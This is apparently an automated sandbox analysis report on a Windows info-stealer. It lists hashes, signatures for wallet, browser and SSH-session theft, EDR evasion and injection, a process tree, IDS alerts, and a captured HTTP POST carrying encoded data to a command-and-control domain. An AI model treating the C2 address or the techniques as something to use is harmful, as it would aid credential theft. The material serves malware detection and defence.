Edit tour

Windows Analysis Report
24EPV9vjc5.exe

Overview

General Information

Sample name:	24EPV9vjc5.exe renamed because original name is a hash value
Original sample name:	c5056ac95a2002bc08cb0ec8dbf064f78dff400642ec1a6fc2a132984a7c1d99.exe
Analysis ID:	1586712
MD5:	ec4072e1ae2a9316270e6afd66235a97
SHA1:	ec499500172ca2cc76c5b30eca34fceb9bacce0d
SHA256:	c5056ac95a2002bc08cb0ec8dbf064f78dff400642ec1a6fc2a132984a7c1d99
Tags:	exeuser-crep1x
Infos:

Detection

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to clear windows event logs (to hide its activities)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

24EPV9vjc5.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\24EPV9vjc5.exe" MD5: EC4072E1AE2A9316270E6AFD66235A97)

24EPV9vjc5.exe (PID: 7388 cmdline: "C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe" -burn.clean.room="C:\Users\user\Desktop\24EPV9vjc5.exe" -burn.filehandle.attached=532 -burn.filehandle.self=520 MD5: EC4072E1AE2A9316270E6AFD66235A97)

RescueCDBurner.exe (PID: 7536 cmdline: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)

RescueCDBurner.exe (PID: 7612 cmdline: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)

cmd.exe (PID: 7732 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

LocalCtrl_alpha_v3.exe (PID: 1280 cmdline: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)

msedge.exe (PID: 5744 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 6816 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2028,i,14218575738694767663,17851418159564160666,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

RescueCDBurner.exe (PID: 6676 cmdline: "C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)

cmd.exe (PID: 4648 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

LocalCtrl_alpha_v3.exe (PID: 1308 cmdline: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)

msedge.exe (PID: 6592 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7320 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2004,i,2358623161053230847,14197786204813222314,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7324 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6892 --field-trial-handle=2004,i,2358623161053230847,14197786204813222314,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7544 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7060 --field-trial-handle=2004,i,2358623161053230847,14197786204813222314,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5844 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7036 --field-trial-handle=2004,i,2358623161053230847,14197786204813222314,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T14:42:20.263464+0100	2028371	3	Unknown Traffic	192.168.2.8	49714	172.67.174.91	443	TCP
2025-01-09T14:42:21.591834+0100	2028371	3	Unknown Traffic	192.168.2.8	49715	172.67.174.91	443	TCP
2025-01-09T14:42:22.689186+0100	2028371	3	Unknown Traffic	192.168.2.8	49716	172.67.174.91	443	TCP
2025-01-09T14:42:50.924043+0100	2028371	3	Unknown Traffic	192.168.2.8	49811	172.67.174.91	443	TCP
2025-01-09T14:42:52.762734+0100	2028371	3	Unknown Traffic	192.168.2.8	49812	172.67.174.91	443	TCP
2025-01-09T14:42:53.147496+0100	2028371	3	Unknown Traffic	192.168.2.8	49813	172.67.174.91	443	TCP
2025-01-09T14:42:53.698120+0100	2028371	3	Unknown Traffic	192.168.2.8	49814	172.67.174.91	443	TCP
2025-01-09T14:42:54.480798+0100	2028371	3	Unknown Traffic	192.168.2.8	49815	172.67.174.91	443	TCP
2025-01-09T14:42:54.483062+0100	2028371	3	Unknown Traffic	192.168.2.8	49816	172.67.174.91	443	TCP
2025-01-09T14:42:56.182258+0100	2028371	3	Unknown Traffic	192.168.2.8	49817	172.67.174.91	443	TCP
2025-01-09T14:42:56.758343+0100	2028371	3	Unknown Traffic	192.168.2.8	49818	172.67.174.91	443	TCP
2025-01-09T14:42:57.930502+0100	2028371	3	Unknown Traffic	192.168.2.8	49819	172.67.174.91	443	TCP
2025-01-09T14:42:58.461468+0100	2028371	3	Unknown Traffic	192.168.2.8	49820	172.67.174.91	443	TCP
2025-01-09T14:42:59.337415+0100	2028371	3	Unknown Traffic	192.168.2.8	49821	172.67.174.91	443	TCP
2025-01-09T14:42:59.726379+0100	2028371	3	Unknown Traffic	192.168.2.8	49822	172.67.174.91	443	TCP

HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15Content-Length: 147Host: bamarelakij.site

Source: 24EPV9vjc5.exe	String found in binary or memory: http://appsyndication.org/2006/appsyn
Source: 24EPV9vjc5.exe, 00000001.00000000.1603651664.00000000009DB000.00000002.00000001.01000000.00000003.sdmp, 24EPV9vjc5.exe, 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmp, 24EPV9vjc5.exe, 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmp, 24EPV9vjc5.exe, 00000002.00000000.1610817388.0000000000BBB000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor
Source: RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://b.chenall.net/menu.lst
Source: RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://bug.reneelab.com
Source: RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003User
Source: RescueCDBurner.exe, 00000003.00000002.1665622100.000000006CF79000.00000002.00000001.01000000.00000009.sdmp, RescueCDBurner.exe, 00000004.00000002.1725993720.000000006D2A9000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://bugreports.qt-project.org/
Source: RescueCDBurner.exe, 00000003.00000002.1665622100.000000006CF79000.00000002.00000001.01000000.00000009.sdmp, RescueCDBurner.exe, 00000004.00000002.1725993720.000000006D2A9000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crt0
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2375493665.000000000820D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2375493665.000000000820D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2375493665.000000000820D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0N
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2375493665.000000000820D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2375493665.000000000820D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2375493665.000000000820D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2375493665.000000000820D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2438917338.0000000002E35000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2301405784.0000000002E32000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://e5.i.lencr.org/0A
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2438917338.0000000002E35000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2301405784.0000000002E32000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://e5.o.lencr.org0
Source: RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://grub4dos.chenall.net/e/%u)
Source: RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://isecure-a.reneelab.com/webapi.php?code=
Source: RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://isecure.reneelab.com.cn/webapi.php?code=
Source: RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://isecure.reneelab.com.cn/webapi.php?code=http://isecure-a.reneelab.com/webapi.php?code=http://
Source: RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://isecure.reneelab.com/webapi.php?code=
Source: RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2375493665.000000000820D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0W
Source: RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2375493665.000000000820D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: RescueCDBurner.exe, 00000004.00000002.1724425061.000000006BB6E000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://qt.digia.com/
Source: RescueCDBurner.exe, 00000004.00000002.1724425061.000000006BB6E000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://qt.digia.com/product/licensing
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://support.reneelab.com/anonymous_requests/new
Source: RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://support.reneelab.com/anonymous_requests/newstore/buy-renee-passnowentrare-nel-bios.htmlItalia
